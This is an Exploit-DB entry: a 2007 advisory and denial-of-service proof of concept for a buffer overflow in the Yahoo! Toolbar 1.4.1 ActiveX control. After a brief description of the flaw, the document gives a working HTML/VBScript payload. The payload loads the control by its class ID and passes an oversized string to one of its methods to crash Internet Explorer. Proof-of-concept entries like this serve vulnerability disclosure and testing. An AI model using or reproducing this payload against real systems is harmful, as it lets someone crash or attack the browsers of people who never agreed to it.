Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

30832


Type:

dos


Platform:

Windows

Date:

2007-11-29


source: https://www.securityfocus.com/bid/26656/info

Yahoo! Toolbar ActiveX Control is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Reports indicate that code execution is not possible, but this has not been confirmed.

Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected. 

<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html>